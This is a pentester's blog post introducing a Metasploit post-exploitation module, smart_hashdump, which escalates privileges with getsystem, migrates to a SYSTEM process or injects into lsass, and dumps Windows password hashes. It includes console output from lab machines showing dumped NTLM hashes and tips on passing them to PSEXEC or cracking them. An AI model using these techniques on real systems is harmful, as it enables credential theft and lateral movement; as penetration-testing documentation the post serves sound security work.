Vulnerability Management, Identity

Metasploit Post Module smart_hashdump

A couple of months ago I was asked by the NWN guys from the pentest team to help them automate dumping windows hashes depending on the role and privilege level, for them I wrote hashdump2 a Meterpreter Script to automate what back then was required. Mubix this week wrote a blog post on his experience and process for when dumping hashes on x64 systems, specially Windows 2008 R2 Domain Controllers. I re-wrote the hashdump2 script and added the logic that Mubix came up with plus added the ability to escalate privileges using the getsystem API call and reworked the logic of the script and ported the result to a post module both called smart_hashdump. The way the module and script works is as follows

  • It first checks the Privilege Level and OS.
  • It will check if the target is a Domain Controller.
  • Based on this information it will prefer the reading of the registry to get the hashes if possible, if not possible it will inject in to the lsass process if possible. For Domain Controllers it will use the injection to lsass.
  • If the target is a Windows 2008 server and the process is running with admin privileges it will attempt to get system privilege using getsystem, if it gets SYSTEM privilege do to the way the token privileges are set it can still not inject in to the lsass process so the code will migrate to a process already running as SYSTEM and then inject in to the lsass process.
  • If the code detects that it is running on a Windows 7/Vista box with UAC disabled and it is running as local admin it will run getsystem and it will use the read registry method.
  • On Windows 2003/2000/XP it will use getsystem and if successful it will use the read registry method.

Script:

meterpreter > run smart_hasdump -h
Meterpreter Script for automating the dumping of local accounts from
the SAM Database and if the targets host is a Domain Controller the
Domain Account Database using the proper technique depending on
privilage level, OS and Role of host.

OPTIONS:

    -h        Help menu.
    -l <opt>  Log folder to save results, if none provided default log path will be used.
    -s <opt>  Try to get SYSTEM Privilege

Module:

msf exploit(handler) > use post/windows/gather/smart_hashdump
msf post(smart_hashdump) > info

       Name: Windows Gather Local and Domain Controler Account Password Hashes
     Module: post/windows/gather/smart_hashdump
    Version: $Revision$
   Platform: Windows
       Arch:
       Rank: Normal

Provided by:
  Carlos Perez <[email protected]>

Description:
  This will dump local accounts from the SAM Database and if the
  targets host is a Domain Controller the Domain Account Database
  using the proper technique depending on privilage level, OS and Role
  of host.


msf post(smart_hashdump) > show options

Module options (post/windows/gather/smart_hashdump):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   GETSYSTEM  false            no        Attempt to get SYSTEM Privilege on the target host.
   SESSION                     yes       The session to run this module on.

Both use the same calls and print almost the same messages so lets use the post module since it is what most of the code is moving to, first lets run it on a Windows 2008 R2 DC:

meterpreter > run post/windows/gather/smart_hashdump GETSYSTEM=true

[*] Running module against WIN2K8R2-01
[*] Hashes will be saved to the Database if one is connected.
[*] Hashes will be saved in loot in John Password File format to:
[*] /Users/carlos/.msf3/loot/20110518200416_default_192.168.1.234_windows.hashes_483699.txt
[+]     This host is a Domain Controller!
[*] Dumping password hashes...
[*] Trying to get SYSTEM Privilege
[+] Got SYSTEM Privilege
[*] Migrating to process owned by SYSTEM
[*] Migrating to wininit.exe
[+] Successfully migrated to wininit.exe
[+]     Administrator:500:aad3b435b51404eeaad3b435b51404ee:d208bd92b52f7cb48eb64c53dbd34552:::
[+]     krbtgtB:502:aad3b435b51404eeaad3b435b51404ee:a6c94aa1141fd563d618b5f1dd0d86c2:::
[+]     testuser:1109:aad3b435b51404eeaad3b435b51404ee:7a118f7a2f2b34d61fa19b840b4f5203:::
[+]     WIN2K8R2-01$?:1006:aad3b435b51404eeaad3b435b51404ee:5780b9a9d5b3fc7792982ae4b7b44b8f:::


On a Windows 7 System with UAC Disabled as Administrator:

meterpreter > run post/windows/gather/smart_hashdump

[*] Running module against WIN701
[*] Hashes will be saved to the Database if one is connected.
[*] Hashes will be saved in loot in John Password File format to:
[*] /Users/carlos/.msf3/loot/20110518201100_default_192.168.1.224_windows.hashes_711181.txt
[*] Dumping password hashes...
[-] On this version of Windows you need to be NT AUTHORITYSYSTEM to dump the hashes
[-] Try setting GETSYSTEM to true.
meterpreter > run post/windows/gather/smart_hashdump GETSYSTEM=true

[*] Running module against WIN701
[*] Hashes will be saved to the Database if one is connected.
[*] Hashes will be saved in loot in John Password File format to:
[*] /Users/carlos/.msf3/loot/20110518201122_default_192.168.1.224_windows.hashes_541308.txt
[*] Dumping password hashes...
[*] Trying to get SYSTEM Privilege
[+] Got SYSTEM Privilege
[*]     Obtaining the boot key...
[*]     Calculating the hboot key using SYSKEY 35f17065cf29faf142844a684d502ba8...
[*]     Obtaining the user list and keys...
[*]     Decrypting user keys...
[*]     Dumping password hashes...
[+]     Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[+]     adminuser:1000:aad3b435b51404eeaad3b435b51404ee:7a118f7a2f2b34d61fa19b840b4f5203:::


on a Windows 7 System as Administrator with UAC:

meterpreter > run post/windows/gather/smart_hashdump GETSYSTEM=true

[*] Running module against WIN-KVJG16GEMOJ
[*] Hashes will be saved to the Database if one is connected.
[*] Hashes will be saved in loot in John Password File format to:
[*] /Users/carlos/.msf3/loot/20110518201439_default_192.168.1.112_windows.hashes_452083.txt
[-] Insufficient privileges to dump hashes!

Sadly UAC does a good job at blocking dumping the hashes even as Administrator, it will even block getsystem.


on a Windows XP System:

meterpreter > run post/windows/gather/smart_hashdump

[*] Running module against TEST-01BCDAF47C
[*] Hashes will be saved to the Database if one is connected.
[*] Hashes will be saved in loot in John Password File format to:
[*] /Users/carlos/.msf3/loot/20110518201750_default_192.168.1.113_windows.hashes_761609.txt
[*] Dumping password hashes...
[+]     Administrator:500:bbc1afce0ca1e5eee694e8a550e822f3:7a118f7a2f2b34d61fa19b840b4f5203:::
[+]     HelpAssistant:1000:17520fb9c159a6be8a692d4f186288a5:4ad260d25ad790417f1a4ef3c44103b2:::
[+]     SUPPORT_388945a0":1002:aad3b435b51404eeaad3b435b51404ee:ec48ef68e471506ab31f656bf5741d63:::

meterpreter > run post/windows/gather/smart_hashdump GETSYSTEM=true

[*] Running module against TEST-01BCDAF47C
[*] Hashes will be saved to the Database if one is connected.
[*] Hashes will be saved in loot in John Password File format to:
[*] /Users/carlos/.msf3/loot/20110518201818_default_192.168.1.113_windows.hashes_177417.txt
[*] Dumping password hashes...
[*] Trying to get SYSTEM Privilege
[+] Got SYSTEM Privilege
[*]     Obtaining the boot key...
[*]     Calculating the hboot key using SYSKEY 4503ffd18cd3ee70d443b159c8626842...
[*]     Obtaining the user list and keys...
[*]     Decrypting user keys...
[*]     Dumping password hashes...
[+]     Administrator:500:bbc1afce0ca1e5eee694e8a550e822f3:7a118f7a2f2b34d61fa19b840b4f5203:::
[+]     HelpAssistant:1000:17520fb9c159a6be8a692d4f186288a5:4ad260d25ad790417f1a4ef3c44103b2:::
[+]     SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:ec48ef68e471506ab31f656bf5741d63:::


On XP and Windows 2003 if you are an administrator you can dump hashes with no problem and getsystem will yield success.

To get a list of all the accounts and hashes from the main console:

msf exploit(handler) > db_creds
[*] Time: 2011-05-18 02:02:08 UTC Credential: host=192.168.1.234 port=445 proto=tcp sname=smb type=smb_hash user=WIN2K8R2-01$? pass=aad3b435b51404eeaad3b435b51404ee:5780b9a9d5b3fc7792982ae4b7b44b8f active=true
[*] Time: 2011-05-18 02:02:08 UTC Credential: host=192.168.1.234 port=445 proto=tcp sname=smb type=smb_hash user=testuser  pass=aad3b435b51404eeaad3b435b51404ee:7a118f7a2f2b34d61fa19b840b4f5203 active=true
[*] Time: 2011-05-18 02:02:08 UTC Credential: host=192.168.1.234 port=445 proto=tcp sname=smb type=smb_hash user=krbtgtB pass=aad3b435b51404eeaad3b435b51404ee:a6c94aa1141fd563d618b5f1dd0d86c2 active=true
[*] Time: 2011-05-18 02:02:08 UTC Credential: host=192.168.1.234 port=445 proto=tcp sname=smb type=smb_hash user=Administrator pass=aad3b435b51404eeaad3b435b51404ee:d208bd92b52f7cb48eb64c53dbd34552 active=true
[*] Time: 2011-05-18 02:03:40 UTC Credential: host=192.168.1.224 port=445 proto=tcp sname=smb type=smb_hash user=adminuser pass=aad3b435b51404eeaad3b435b51404ee:7a118f7a2f2b34d61fa19b840b4f5203 active=true
[*] Time: 2011-05-18 02:03:40 UTC Credential: host=192.168.1.224 port=445 proto=tcp sname=smb type=smb_hash user=Administrator pass=aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 active=true
[*] Time: 2011-05-18 02:06:15 UTC Credential: host=192.168.1.113 port=445 proto=tcp sname=smb type=smb_hash user=HelpAssistant pass=17520fb9c159a6be8a692d4f186288a5:4ad260d25ad790417f1a4ef3c44103b2 active=true
[*] Time: 2011-05-18 02:06:15 UTC Credential: host=192.168.1.113 port=445 proto=tcp sname=smb type=smb_hash user=Administrator pass=bbc1afce0ca1e5eee694e8a550e822f3:7a118f7a2f2b34d61fa19b840b4f5203 active=true
[*] Time: 2011-05-18 02:06:15 UTC Credential: host=192.168.1.113 port=445 proto=tcp sname=smb type=smb_hash user=SUPPORT_388945a0 pass=aad3b435b51404eeaad3b435b51404ee:ec48ef68e471506ab31f656bf5741d63 active=true
[*] Found 9 credentials

.

If you are going to use those hashes in PSEXEC and for cracking remember to filter the Guest, SUPPORT_* and HelpAssistant accounts since typically they are disabled. On the Domain Controller the account with the hostname$ is the Active Directory Recovery Account many time the same as the Domain Admin Account and it can not be used remotely.

I included the creation of a loot file with the hashes for 2 reasons

  1. It saves the SID of the account so as to identify the accounts and be able to use those if needed.
  2. Some times you do not have a Database attached or delete a workspace by accident.

Script Download

Module Download

Carlos Perez

Carlos is currently the Principal Consultant, Team Lead for Research at TrustedSec and well-known for his research on both Metasploit and Windows Powershell. His blog www.darkoperator.com carries the tag line: “Shell Is Only The Beginning”.

Get daily email updates

SC Media's daily must-read of the most current and pressing daily news

By clicking the Subscribe button below, you agree to SC Media Terms and Conditions and Privacy Policy.